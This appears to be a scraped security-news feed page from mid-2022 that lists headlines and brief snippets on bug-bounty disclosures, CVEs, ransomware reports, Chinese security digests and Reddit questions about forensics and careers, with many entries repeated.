    How to set up and operate a red team in your company to support a sustainable cybersecurity…
    Hack yourself to prevent from being hacked. This more or less describes the term "Red Teaming." But why do you need a red team though you… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-14 Review
    Cloud I Hack into Google Cloud by h4ck01 Shodan 与 Censys 扫描一瞥 by Avenger 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-14 Review
    Cloud I Hack into Google Cloud by h4ck01 Shodan 与 Censys 扫描一瞥 by Avenger 更多最新文章,请访问SecWiki
  • Open

    THQ Nordic - Media and Game Assets
    submitted by /u/xD3CrypTionz [link] [comments]
  • Open

    How I found a Critical Bug in Instagram and Got 49500$ Bounty From Facebook
    No content preview
  • Open

    How I found a Critical Bug in Instagram and Got 49500$ Bounty From Facebook
    No content preview
  • Open

    How I found a Critical Bug in Instagram and Got 49500$ Bounty From Facebook
    No content preview
  • Open

    HTML Injection in E-mail
    Acronis disclosed a bug submitted by mega7: https://hackerone.com/reports/1536899
    Reflected Cross Site Scripting at ColdFusion Debugging Panel http://www.grouplogic.com/CFIDE/debug/cf_debugFr.cfm
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1166918
    Reflected Cross Site Scripting at http://www.grouplogic.com/files/glidownload/verify3.asp [Uppercase Filter Bypass]
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1167034
    Rails::Html::SafeListSanitizer vulnerable to xss attack in an environment that allows the style tag
    Ruby on Rails disclosed a bug submitted by windshock: https://hackerone.com/reports/1530898
  • Open

    信安标委发布《APP个人信息处理活动管理指南》征求意见稿
    《征求意见稿》针对移动智能终端提供了App个人信息安全功能设计、管理个人信息安全风险的指南,以增强App收集个人信息行为的明示程度。
    保持警觉,勒索软件HelloXD可能在你的系统上部署新后门
    近日,有观察人士发现,勒索软件HelloXD新部署了一个后门——MicroBackdoor,旨在加强其对受感染主机的持续远程访问。
    FreeBuf早报 | 微软今日起终止对IE浏览器的支持;智能商业建筑网络安全风险凸显
    在终止支持后,它将被新的基于 Chromium 的 Microsoft Edge 取代,用户在启动 IE11 时会自动重定向到 Edge。
    虚假私信钓鱼、假冒艺术家、高价转售:常见的NFT骗局
    一些涉及NFT的常见骗局,请注意识别避免上当。
    后量子密码学:改变在线安全
    从本质上讲,密码学只是保护和加密信息的一种手段。
    俄沙虫组织利用Follina漏洞,入侵乌克兰重点机构
    乌克兰计算机应急响应小组 (CERT) 警告说,俄罗斯黑客组织Sandworm可能正在利用名为Follina的漏洞攻击乌克兰。
    45% 的网络安全从业者因压力过大,考虑退出该行业
    压力过大的主要来自勒索软件的无情威胁和需要随时待命。
    SASE何时迎来市场爆发?
    SASE市场爆发还需要3~5年的时间,其中远程办公、物联网会是短期内推动这个市场的利好因素,可以多加关注。
    宜宾凯翼汽车有限公司招聘信息
    宜宾凯翼汽车有限公司招聘信息。
    WiFi探测正在跟踪、泄露隐私
    WiFi探测可以轻松获得用户的各种隐私信息,同时还可以实时跟踪用户。
    微软:Exchange 服务器正被用来部署 BlackCat 勒索软件
    据BleepingComputer网站6月13日消息,网络攻击者正通过BlackCat 勒索软件攻击存在漏洞的Microsoft Exchange 服务器。在微软安全专家观察到的案例中,攻击者使用未修补的 Exchange 服务器作为入口向量的初始攻击,两周后,再通过 PsExec 在网络上部署了 BlackCat 勒索软件有效负载。“虽然这些威胁参与者的常见入口向量包括远程桌面应用程序和受损凭据
  • Open

    CVE-2022-26134 being exploited to download and deploy the Cerber2021 ransomware
    Article URL: https://twitter.com/MsftSecIntel/status/1535417779960131584 Comments URL: https://news.ycombinator.com/item?id=31735573 Points: 2 # Comments: 0
  • Open

    Analysis Report on Recent Hidden Malicious Code Sites on a Chinese HFS HTTP File Servers
    submitted by /u/Late_Ice_9288 [link] [comments]

  • Open

    Exposed Travis CI API Leaves All Free-Tier Users Open to Attack
    submitted by /u/mkatch [link] [comments]
    The many lives of BlackCat ransomware
    submitted by /u/SCI_Rusher [link] [comments]
    JWT attacks (with online labs)
    submitted by /u/albinowax [link] [comments]
    Privilege Escalation in Microsoft Azure Synapse Analytics
    submitted by /u/dinobyt3s [link] [comments]
    The State of CSRF Vulnerability in 2022
    submitted by /u/utku1337 [link] [comments]
  • Open

    Tenable CTF 2022 — Babby Web 2
    Same link? I wasn’t so sure at first. After poking a bit, I read the challenge again and “authentic” finally stuck out. This should have… Continue reading on Medium »
    Careers in Cyber | TryHackMe
    Lab Access: https://tryhackme.com/room/careersincyber Continue reading on Medium »
  • Open

    Hello
    Whats your opinion on Antiviruses because my mum is always saying "u nid antavarus coz money bank omy god ur so trash at computers" while most of antivirus programs are just a money rip off and you can just use your brain when using the computer submitted by /u/xblacky11 [link] [comments]
    How to secure a Bind DNS server exposed to Internet ?
    Any tools, utilities or recommandations to detect and block DNS attacks like amplification ? Please note that the server has to be exposed to Internet. submitted by /u/aim4r [link] [comments]
    PASTA real-life example
    I am looking for some real-life examples of PASTA applied to an organization/application. I have understanding of the process, the seven stages etc. I would like to see some actual inputs and outputs of all the seven stages. Is there anything like that available anywhere? submitted by /u/palm_snow [link] [comments]
  • Open

    War in Ukraine / June 10–12
    Ukraine needs 1,000 howitzers Continue reading on Medium »
    Fingerprinting email senders…
    Hello… Today we will discuss fingerprinting (logging) email senders. First, what is logging. This is the logging process i.e. information… Continue reading on Medium »
  • Open

    The many lives of BlackCat ransomware
    submitted by /u/SCI_Rusher [link] [comments]
  • Open

    SecWiki News 2022-06-13 Review
    SecWiki周刊(第432期) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-13 Review
    SecWiki周刊(第432期) by ourren 更多最新文章,请访问SecWiki
  • Open

    Remote Forensics on Live Systems
    I posted in /r/CrowdStrike about using Real Time Response to perform forensics. TL;DR While CrowdStrike offers Falcon Forensics, some organizations have not purchased it. I have seen a post mentioning KAPE, Kansa and PowerForensics. However, both the Kansa and PowerForensics projects seem to be unmaintained. Additionally, there were concerns about using KAPE as it could over-write memory, HDD space, etc. For Falcon Forensics, an EXE has to be copied (if not already present on the endpoint) and executed. Couldn't that over-write memory, HDD space, etc. as well? I am digging into the KAPE docs now and comparing the capabilities of Falcon Forensics to KAPE. What are folks using these days for remote forensics against live systems? Do you agree about the over-writing concerns? TIA Kevin submitted by /u/kevinelwell [link] [comments]
    Anatomy of an NTFS FILE Record - Windows File System Forensics
    Good morning, It’s time for a new 13Cubed episode! In this one, we’ll talk about the structure and composition of an NTFS FILE record. Then, we'll take a look at a sample record for a resident file and learn how to manually extract the important attributes. Note that there is also an accompanying cheat sheet which may come in handy (see the video’s description)! Episode: https://www.youtube.com/watch?v=l4IphrAjzeY Episode Guide: https://www.13cubed.com/episodes/ 13Cubed YouTube Channel: https://www.youtube.com/13cubed 13Cubed Patreon (Help support the channel and get early access to content and other perks!): https://www.patreon.com/13cubed submitted by /u/13Cubed [link] [comments]
  • Open

    Dreamcast Games and Movies. Yes, people are still making new movies playable on Dreamcast.
    submitted by /u/RealAGB [link] [comments]
    Older Movies and TV - Mostly Horror
    https://movies.encrypticmh.appboxes.co/ https://tv.encrypticmh.appboxes.co/ submitted by /u/sy029 [link] [comments]
    cow breeds
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
  • Open

    GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool
    A new, difficult-to-detect remote access trojan named PingPull is being used by GALLIUM, an advanced persistent threat (APT) group. The post GALLIUM Expands Targeting Across Telecommunications, Government and Finance Sectors With New PingPull Tool appeared first on Unit 42.
  • Open

    lack of rate limit on athentification login page & forgot password page
    Showmax disclosed a bug submitted by saidkira: https://hackerone.com/reports/1591764
  • Open

    NTLM Authentication in Active Directory
    No content preview
    How to get started in Cybersecurity in 2022
    No content preview
  • Open

    NTLM Authentication in Active Directory
    No content preview
    How to get started in Cybersecurity in 2022
    No content preview
  • Open

    NTLM Authentication in Active Directory
    No content preview
    How to get started in Cybersecurity in 2022
    No content preview
  • Open

    聊下最近的 CVE-2022-30190
    作者:heige@知道创宇404实验室 原文链接:https://mp.weixin.qq.com/s/tb0K-qLcZo-9OeW3KsIrTg 最近曝光的在野0day挺多的,看起来又为今年的年终的总结提供不少弹药,看到这个漏洞我在朋友圈里简单评论下: CVE-2022-30190 (Follina) 这个漏洞在我的标准里可以算是"神洞"了,品相远比CVE-2021-40444要高。每...
  • Open

    聊下最近的 CVE-2022-30190
    作者:heige@知道创宇404实验室 原文链接:https://mp.weixin.qq.com/s/tb0K-qLcZo-9OeW3KsIrTg 最近曝光的在野0day挺多的,看起来又为今年的年终的总结提供不少弹药,看到这个漏洞我在朋友圈里简单评论下: CVE-2022-30190 (Follina) 这个漏洞在我的标准里可以算是"神洞"了,品相远比CVE-2021-40444要高。每...
  • Open

    Screams of Power vulnerabilities (Powertek-based PDUs)
    (moved updates to the bottom) Even if the PDUs you use in your data center aren't branded "Powertek", please keep reading. Powertek is a company that makes datacenter class smart PDUs (Power Distribution Units - i.e. heavy duty power cords) for server racks. They sell both directly (or at least used to in the past I think?) and through their resellers. There is one reseller per country and they commonly rebrand their PDUs (e.g. mine has a logo of the Swiss reseller - schneikel). Anyway, in March I've done a quick 3h review of the firmware and found multiple vulnerabilities and weaknesses in Powertek PDU's firmware v3.30.23 and possibly prior (details below). So, if you're using a PDU that is running Powertek firmware, you might want to patch now. One more note on patch dist…

  • Open

    Best approach to start mobile (Android/iOS) exploit dev ?
    Hello, Im thinking about a career in mobile (Android/iOS, especially Android) security research and i would like to know what is the best way to go for it, in terms of methodology and best resources to learn from. I do have some experience with x86 Assembly and programming languages (mostly high level like C#, Dart and all with some experience in C++ for software development). I would appreciate any suggestions, thank you very much in advance! submitted by /u/Ankhyx [link] [comments]
  • Open

    How to Check Google Doc for when spesific entries was made?
    I dont have Editing permissions or anything like that. ​ Is there any way to find out when a certain Entry was made? I only have the downloaded file. ​ I am trying to prove it was edited after a spesific date submitted by /u/tirehu [link] [comments]
    How can I tell if a document has come straight from the official source or if it has been opened and edited off that official site? I
    How can I tell if a document has come straight from the official source or if it has been opened and edited off that official site? I already know I have a document that has been tampered with because I was able to get the originals. Today I opened both of them up on my laptop through Google docs and the authentic one opened up and looks exactly the same. And the altered one when opened up I noticed it opened up in a different layout. The text isn’t the same size, some of the text is yellow, some of the letters like the “s” is changed to a $ sign. Does this show more proof that they were altered, I’m guessing on a computer not associated with the official place. I am not a computer person, but I remember professors saying how they can put your papers in something and it will show if parts are copied and pasted or plagiarized or whatever. So did I just discover more evidence that backs up on a tech level that these documents were altered after being received off of the original source? submitted by /u/Antique-Dark-907 [link] [comments]
  • Open

    Professional advice needed
    Utilizing my college years Hello all, I have recently just finished my first year of undergrad at UOregon, while being a Computer Science major. I have a strong interest in cybersecurity and went into this school hoping to find more opportunities to indulge in cybersec-like activities. At the beginning of the school year, I ended up landing a IT tech/helpdesk position at my school as well. A few months later, I landed a position at the cybersecurity office here at the school. So, I am currently working as a Student IT technician, and a Student Security Analyst. I plan on working the IT job thru summer 2022, and then quitting; to increase my hours at the analyst position. I plan on staying in that position until I graduate. Tis position also offers assistance and guidance towards certifications. I plan on getting my Network+ this summer, and then Security+ sometime in 2023. After I graduate I will have just about four years of experience within the cybersecurity dept. at my school. On another note, I am doing a good amount of home study as well, and really trying to push my python skills to the next level. What I am really trying to do, and will be my goal until I graduate, is to put myself in the best position, and set myself up as much as possible, to be able to land a great job once I graduate. The reason I am posting, is to ask more experienced personnel, what more can I do to set myself up for a great career? I feel like I am on a good track at the moment, but I want to fully utilize the next 3 years I have in college. Thank you for reading! P.S. may be posting in other places, sorry for the spam if I end up doing so. submitted by /u/Straight_Bid_5577 [link] [comments]
    Wi-Fi malware
    I don’t know if this is the right place to ask. If it’s not, tell me where I should write it, thank you. My question may seem stupid but: I accidentally connected to a Wi-Fi which I’ve never seen before (and haven’t ever seen after I disconnected). The Wi-Fi network was apparently one of my neighbor’s network, but again, never seen that wifi before and after. The Wi-Fi network had no password, I immediately disconnected, like in 5-10 seconds. Is it possible to get any malware or other kinds of unwanted software, spyware, adware through that WiFi connection? Thank you, and again, if this is a wrong place to ask about it, let me know. submitted by /u/mesropmashtots [link] [comments]
    A question for full time pen testers
    All of these ctf’s and junk really seem to get crazy about using gobuster or dirbuster, do any of you, full time pen testers that have been doing this for a while ever actually feel the need to use this? Now granted most of my experience is net pen not web app, but wanted to get a consensus from more people. submitted by /u/networkalchemy [link] [comments]
  • Open

    Vulnerability During Transition
    Article URL: https://biggestfish.substack.com/p/vulnerability-during-transition Comments URL: https://news.ycombinator.com/item?id=31716383 Points: 2 # Comments: 0
    Exploration of the Dirty Pipe Vulnerability (CVE-2022-0847)
    Article URL: https://lolcads.github.io/posts/2022/06/dirty_pipe_cve_2022_0847/ Comments URL: https://news.ycombinator.com/item?id=31712986 Points: 42 # Comments: 1
  • Open

    Researcher defends Formidable in fight against ‘critical’ CVE assignment
    Article URL: https://portswigger.net/daily-swig/researcher-defends-formidable-in-fight-against-critical-cve-vulnerability-assignment Comments URL: https://news.ycombinator.com/item?id=31716274 Points: 2 # Comments: 0
    Exploration of the Dirty Pipe Vulnerability (CVE-2022-0847)
    Article URL: https://lolcads.github.io/posts/2022/06/dirty_pipe_cve_2022_0847/ Comments URL: https://news.ycombinator.com/item?id=31712986 Points: 42 # Comments: 1
  • Open

    I wrote a non technical post on my blog regarding security specialists, nihilistic behavior, and how to stay positive. Sometimes we need a reminder that, after all, things are not that bad.
    submitted by /u/last0x00 [link] [comments]
    A project for aspiring hackers to easily learn our craft
    submitted by /u/cr0mll [link] [comments]
    bevigil-cli : A handy tool to extract assets like subdomains, URL params, hosts, S3 buckets, URLs from android applications through BeVigil OSINT API with ease.
    submitted by /u/xscorp7 [link] [comments]
    NGINX security: Everything you may not need to know about NGINX error logs - complete guide
    submitted by /u/jwizq [link] [comments]
    I made a browser extension that spoofs your location data to match your VPN. It can also spoof your user agent.
    submitted by /u/z0ccc_z0ccc [link] [comments]
  • Open

    SecWiki News 2022-06-12 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-12 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Learning More About YAML Deserialization
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe: LazyAdmin
    No content preview
  • Open

    Learning More About YAML Deserialization
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe: LazyAdmin
    No content preview
  • Open

    Learning More About YAML Deserialization
    Introduction Continue reading on InfoSec Write-ups »
    TryHackMe: LazyAdmin
    No content preview
  • Open

    Phoneinfoga- Wikipedia of Phone Numbers.
    The Wikipedia Of Phone Number…Read This Article To Know All The Information Of Your Phone Number, Its All PUBLIC!! Continue reading on Medium »
  • Open

    The Four V’s of Effective Cybersecurity Posture
    There are four critical angles to achieve optimal cyber defense: Visibility, verification, vigilance, and validation. Rapid development… Continue reading on Purple Team »

  • Open

    All user password hash can be seen from admin panel
    UPchieve disclosed a bug submitted by dark_haxor: https://hackerone.com/reports/1489892
    CVE-2022-30115: HSTS bypass via trailing dot
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565622 - Bounty: $2400
    CVE-2022-27780: percent-encoded path separator in URL host
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565619 - Bounty: $2400
    CVE-2022-27779: cookie for trailing dot TLD
    Internet Bug Bounty disclosed a bug submitted by haxatron1: https://hackerone.com/reports/1565615 - Bounty: $2400
    disclosure the live_analytics information of any livestream.
    TikTok disclosed a bug submitted by datph4m: https://hackerone.com/reports/1561299 - Bounty: $1000
    Email address disclosure via invite token validatiion
    TikTok disclosed a bug submitted by noob_but_cut3: https://hackerone.com/reports/1560072 - Bounty: $250
  • Open

    What is your experience with being a digital forensic investigator?
    I'm currently looking into this line of work and I wanted to know what it's like. I've seen some people have bad experiences while others recommend this job. submitted by /u/Late_Ranger5256 [link] [comments]
    FTK toolkit 6.3.1, software completely unusable during index and index merge
    Am I just some kind of moron, or is this software supposed to be 100% unusable for 15 straight hours while it does the initial index and then the index merge? Has FTK just turned into the ultimate billable hours machine? its 2 million items, this shouldnt really be taking this long right? submitted by /u/NinjaLion [link] [comments]
  • Open

    Binary Analysis with Strace
    submitted by /u/DLLCoolJ [link] [comments]
    OUs and GPOs and WMI Filters, Oh My!
    submitted by /u/5ub34x_ [link] [comments]
  • Open

    CREST CRT exam prep?
    I'm well on my way with studying for my CPSA. Any advice on any labs tryhackme rooms/paths or hackthebox boxes, that I should be concentrating on for CRT exam? any advice appreciated. submitted by /u/Snoo77500 [link] [comments]
    SlowLoris mitigation on SSH
    Hi I know SlowLoris typically runs over HTTP, but for an assignment I had to run a SlowLoris over SSH instead over HTTP and had to find ways to mitigate the attack. The usual answer you find for a standard slowlorris attack is that you should use nginx, but even then there was conflicting information on the web. I tried to mitigate the attack over ssh with a simple iptables rule, but apparently there are more ways to stop this style of attack. Especially if it is a distributed attack, where iptables not really would work. I tried to find a way to check for especially longlasting or slow connections but did not find any good resources. How would you protect a system against such an attack? submitted by /u/curkus [link] [comments]
    How to use Chromium web developer tools to change the HTML and bypass to gain admin panel access?
    Hello, I was told I should check at the HTML of the User Registration website (code at the bottom) to know how to do this. I think I should change this line of code: Admin Panel but I don't know how to change the HTML. Should I use Web developer tool for Chromium? I'm blocked with this for too long. Thanks for any help ​ CODE: Password Confirm password Admin Panel div class="btn-group"> Info Only possible if you have a special autorisation submitted by /u/Traditional_Bird_877 [link] [comments]
  • Open

    Timing from HackTheBox — Detailed Walkthrough
    No content preview
    [Bug Bounty] How I was able edit AWS’s files from file upload function?
    No content preview
  • Open

    Timing from HackTheBox — Detailed Walkthrough
    No content preview
    [Bug Bounty] How I was able edit AWS’s files from file upload function?
    No content preview
  • Open

    Timing from HackTheBox — Detailed Walkthrough
    No content preview
    [Bug Bounty] How I was able edit AWS’s files from file upload function?
    No content preview
  • Open

    SecWiki News 2022-06-11 Review
    通过NPM生态系统中的依赖树揭开脆弱性传播及其演化的神秘面纱 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-11 Review
    通过NPM生态系统中的依赖树揭开脆弱性传播及其演化的神秘面纱 by ourren 更多最新文章,请访问SecWiki
  • Open

    Index of open FTP servers
    https://www.mmnt.net/ there are many ftp servers indexed, like https://www.mmnt.net/db/0/0/88.166.133.247/Public/Films%20&%20S%C3%A9ries , films you can download. submitted by /u/iams0rry [link] [comments]
  • Open

    First CTF — Tenable CTF 2022
    So this week I did a thing, joined Tenable CTF this year. So far its honestly showing me my weak points. I look forward to seeing if I can… Continue reading on Medium »
  • Open

    Exposing HelloXD Ransomware and x4k
    HelloXD is a ransomware family in its initial stages – but already seeking to impact organizations. We analyze samples and hunt for attribution. The post Exposing HelloXD Ransomware and x4k appeared first on Unit 42.

  • Open

    photos of old paintings
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Is it possible to explore hidden folders of open directories ?
    Sometime when you explore open directories by adding /storage /drive /disk at their top level of open directory index address you can enter and access to their kinda hidden directory which was not visible at their top level of open directory index ! ​ But it is kinda hard job to do it manually adding /storage1 /drive2 /disk3 etc... (as I am not even sure if that directories even exists) depends of directories but sometimes it exist ! ​ So I want to know if there are any tip to explore " the hidden directories that are not present at the top index level but which are actually accessible by maunally typing at address bar" ​ Thanks i n advance guys submitted by /u/Synchel [link] [comments]
  • Open

    Denial of Service Vulnerability in Envoy Proxy – CVE-2022-29225
    Article URL: https://jfrog.com/blog/denial-of-service-vulnerability-in-envoy-proxy-cve-2022-29225/ Comments URL: https://news.ycombinator.com/item?id=31700170 Points: 1 # Comments: 1
  • Open

    Denial of Service Vulnerability in Envoy Proxy – CVE-2022-29225
    Article URL: https://jfrog.com/blog/denial-of-service-vulnerability-in-envoy-proxy-cve-2022-29225/ Comments URL: https://news.ycombinator.com/item?id=31700170 Points: 1 # Comments: 1
    Apple M1 chip contains hardware vulnerability that bypasses memory defense
    Article URL: https://www.theregister.com/2022/06/10/apple_m1_pacman_flaw/ Comments URL: https://news.ycombinator.com/item?id=31696129 Points: 5 # Comments: 0
    Vulnerability in Gitlab: Sending Arbitrary Requests Through Jupyter Notebooks
    Article URL: https://liman.io/blog/gitlab-security-vulnerability-jupyter-notebooks Comments URL: https://news.ycombinator.com/item?id=31695949 Points: 3 # Comments: 0
    MIT Finds Apple M1 Vulnerability, Demos Pacman Attack
    Article URL: https://www.tomshardware.com/news/mit-finds-vulnerability-in-arm-chips-demos-pacman-attack-on-apple-m1 Comments URL: https://news.ycombinator.com/item?id=31693578 Points: 5 # Comments: 1
    Apple M1 Affected by Pacman Hardware Vulnerability in Arm Pointer Authentication
    Article URL: https://www.phoronix.com/scan.php?page=news_item&px=Apple-M1-PACMAN Comments URL: https://news.ycombinator.com/item?id=31692824 Points: 7 # Comments: 2
    Security Vulnerability in Gitlab: Sending Requests Through Jupyter Notebooks
    Article URL: https://liman.io/blog/gitlab-security-vulnerability-jupyter-notebooks Comments URL: https://news.ycombinator.com/item?id=31691130 Points: 1 # Comments: 0
  • Open

    password manager for IT department
    what is everyone using in their IT Department to share passwords? looking for something with MFA\yubikey. reading about dashlane and 1password and seems like in the past year I read that both are not what they used to be. bitwarden, some say it clunky, but seems well liked. really looking for something to sync to cloud, so we have offline access. submitted by /u/clarksavagejunior [link] [comments]
    Do Windows Defender detect follina?
    If it does what does it call it. Does MS have a different name for this attack or does it only detect the payload it tries to inject. submitted by /u/ThePorko [link] [comments]
    Broad subject, overwhelmed by choice of programming languages to focus on.
    Hi I'm a 2nd year Cybersecurity student and I am shooting for a career along the lines of pentesting, cybersec researcher, network engineer. I studied Python but, frankly, I sucked and I needed much more practice. At the same time I have a 3 month break of no studies where I wanna use this time to choose a language to learn. Cybersecurity is such a broad subject. Sometimes I can't see the forest through the trees. I need help on choosing where to focus my efforts. These are my choices: Learn C Learn (more)BASH Learn (more)Python As far as resources I have: Devices: A smart phone a busted laptop failing to run Kali Linux waitin for a fresh install and an Ubuntu desktop. Books: The Rootkit Arsenal by Bill Blunden Applied Cryptography: Protocols, algorithms and source code in C by Bruce Schneier Black Hat Python by Justin Seitz Online: Cisco Network Academy courses, networking essentials, cloud computing.. First year study materials for subjects on python coding, Linux shell, operating systems, hardware, OS architecture. A subscription to TryHackMe (offensive security path). I'd really appreciate your thoughts because I feel like I've got all this gear and all this motivation but...where to start, and which info will still be useful in 20 years? 50 years? submitted by /u/hobnobmatrixx [link] [comments]
  • Open

    bd-j exploit chain
    PlayStation disclosed a bug submitted by theflow0: https://hackerone.com/reports/1379975 - Bounty: $20000
    RXSS on
    U.S. Dept Of Defense disclosed a bug submitted by tmz900: https://hackerone.com/reports/1555582
  • Open

    SecWiki News 2022-06-10 Review
    针对解释性语言包管理器的供应链攻击研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-10 Review
    针对解释性语言包管理器的供应链攻击研究 by ourren 更多最新文章,请访问SecWiki
  • Open

    Brainpan 1 WriteUp Tryhackme
    No content preview
  • Open

    Brainpan 1 WriteUp Tryhackme
    No content preview
  • Open

    Brainpan 1 WriteUp Tryhackme
    No content preview
  • Open

    HP Server Raid
    I have got two HP servers (Z820 Workstation and a Proliant DLP360P Gen 8) these both have 4 x 10 TB disks inside. I cannot turn these on due to various reasons. I have used X-Ways to try and rebuild the RAID using the Level 5 Backward Delayed (HP)it showed there is a LVM2 container found a video online that shows you need to scan for the lost partitions which I done but did not bring back any results. I have also tried using RAID Reconstructor but is unable to tell me anything about the RAID settings which makes me believe it is a proprietary HP RAID Any suggestions in getting these RAID's rebuilt would be appreciated submitted by /u/ambitiousdonut94 [link] [comments]
  • Open

    CVE-2022-0540 Atlassian JIRA 存在认证绕过漏洞影响范围广泛
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/3EWju-IdsTfK7COKOK-c-w 漏洞信息 JIRA 存在 Seraph 组件认证绕过漏洞,影响范围广泛: 根据官方描述,大批量的默认和第三方插件受到影响: 关于Seraph Filter 对于认证绕过,猜测问题可能出现在 Filter 过滤上,JIRA 内部封装了数量较为庞大的 Filter 列...
    CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw 漏洞信息 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2022年5月4日,F5官方发布安全通告,修复了一个存在于BIG-IP iControl REST中的身份验证绕过漏洞。漏洞编号:CVE-2022-13...
  • Open

    CVE-2022-0540 Atlassian JIRA 存在认证绕过漏洞影响范围广泛
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/3EWju-IdsTfK7COKOK-c-w 漏洞信息 JIRA 存在 Seraph 组件认证绕过漏洞,影响范围广泛: 根据官方描述,大批量的默认和第三方插件受到影响: 关于Seraph Filter 对于认证绕过,猜测问题可能出现在 Filter 过滤上,JIRA 内部封装了数量较为庞大的 Filter 列...
    CVE-2022-1388 F5 BIG-IP iControl REST 处理进程分析与认证绕过漏洞复现
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw 漏洞信息 F5 BIG-IP是美国F5公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2022年5月4日,F5官方发布安全通告,修复了一个存在于BIG-IP iControl REST中的身份验证绕过漏洞。漏洞编号:CVE-2022-13...

  • Open

    Launching the PortSwigginar
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included; A recap on “what’s new” within the tool for those who have
  • Open

    Launching the PortSwigginar
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included; A recap on “what’s new” within the tool for those who have
  • Open

    Cyber Security Mind Map: Any ideas here useful?
    Does anyone think any of these ideas in green are worthwhile? Cyber Security Mind Map I'm looking for honest feedback. I just used the SCAMPER technique, along with this mind map to think of these ideas. For example, focusing on Anti-Malware with SCAMPER... I just went through some of the questions in the video for Substitute, Combine, Adapt, Modify, Purpose, and Rearrange to generate new ideas relating to Anti-Malware and other topics. My question is would any of the ideas described in the mind map be useful in preventing or detecting attacks? I haven't been able to get any feedback so far. :( submitted by /u/greyyit [link] [comments]
  • Open

    Magnet business strategy and pricing (Cyber?)
    What do you think about Magnet not including Email explorer feature in Non Cyber version of Axiom? https://www.magnetforensics.com/blog/reviewing-email-evidence-with-email-explorer-in-magnet-axiom-cyber/ It seems that they are starting to carve at features to force customers into Axiom Cyber. Axiom Cyber is 12K USD I think. As a reminder this is what we used to pay when they released Axiom 4 years ago. IEF: $3,625 AXIOM Computer: $3,800 AXIOM (Computer & Mobile): $5,600 Their spiel is that Cyber will be corporate and standard Axiom LEO oriented but I am not buying that. Love the software but they always played with the features being extra and then just charging more.. This was IEF comment I got at the Axiom release time: email quote: We rolled all the artifacts up into new IEF licenses so customers wouldn’t have to come back to us to buy any modules they may have forgot to include. More like we were forgetting to go deeper in the wallet so we made it mandatory... submitted by /u/Erminger [link] [comments]
    moto stylus
    Has anyone been able to get an image of this phone moto stylus ? I just need the call list if there is some way to obtain it. Thanks submitted by /u/JW4704 [link] [comments]
    Mount Navigation Device as Mass Storage instead of MTP
    Is there a way to sort of force-mount a navigation device (Garmin) as Mass Storage so I can pull a physical image? submitted by /u/visorov [link] [comments]
    Filesystem Imaging iOS
    Hello community … I’m trying to create dd image of filesystem for iOS 9.3.5 and 12 After ssh in the device, when trying to create dd … displays resource is busy … umount command also shows the partition is busy … How may I proceed to create the dd image or create tar ball … Any suggestions would be helpful submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    SecWiki News 2022-06-09 Review
    微软数据安全防护之Know Your Data by ourren 对数据安全的一些思考 by ourren 我所理解的安全运营 by adrain 从RSAC 2022创新沙盒看网安技术创新趋势 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-09 Review
    微软数据安全防护之Know Your Data by ourren 对数据安全的一些思考 by ourren 我所理解的安全运营 by adrain 从RSAC 2022创新沙盒看网安技术创新趋势 by ourren 更多最新文章,请访问SecWiki
  • Open

    WMI Providers for Script Kiddies
    Introduction So, this WMI stuff seems legit. Admins get a powerful tool which Script Kiddies can also use for profit. But there’s gotta be more, right? What if I want to take my WMI-fu to the next level? In the previous blog post, “WMI for Script Kiddies,” we described Windows Management Instrumentation (WMI). We detailed... The post WMI Providers for Script Kiddies appeared first on TrustedSec.
  • Open

    LockBit 2.0: How This RaaS Operates and How to Protect Against It
    LockBit 2.0 has so far been this year's most active ransomware gang on double-extortion leak sites. Learn about their tactics. The post LockBit 2.0: How This RaaS Operates and How to Protect Against It appeared first on Unit 42.
  • Open

    Moderator can enable cam/mic remotely if cam/mic-permission was disabled while user has activated cam/mic
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/1520685 - Bounty: $100
    Integer overflows in unescape_word()
    curl disclosed a bug submitted by ddme: https://hackerone.com/reports/1564922
    match
    curl disclosed a bug submitted by maslahhunter: https://hackerone.com/reports/1555440
  • Open

    Tesla NFC Key Card Security Vulnerability Demonstration
    Article URL: https://old.reddit.com/r/teslamotors/comments/v86pc1/tesla_nfc_key_card_security_vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31680342 Points: 2 # Comments: 0
    Zero-Day Vulnerability in Atlassian Confluence
